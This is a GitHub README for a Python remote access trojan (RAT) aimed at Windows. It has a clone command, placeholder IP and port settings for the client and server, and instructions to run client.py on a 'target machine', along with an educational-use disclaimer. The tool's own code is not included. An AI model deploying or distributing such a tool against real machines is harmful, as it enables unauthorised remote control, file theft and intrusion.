◐ Shell
clean mode source ↗

GitHub - sabixr/Simple-Python-RAT: Windows Remote Access Tool with support for uploads, downloads and fun commands.

Stargazers

About

Windows Remote Access Tool with support for uploads, downloads and fun commands.

Disclaimer

This tools is for educational purposes only. Do not use this unless you have permission

Built With

Prerequisites

  • colorama

Setup

  1. Clone the repo
    git clone https://github.com/k200-dev/Windows-Python-RAT/
  2. Fill in the values in client.py and server.py
    ratClient = RATConnector("ENTER IP ADDRESS", ENTER PORT)
    activeServer = Server("ENTER IP ADDRESS", ENTER PORT)

Usage

Run server.py on your local machine and client.py on the target machine. Run ratHelp in the terminal to see a list of commands

Image of the RAT server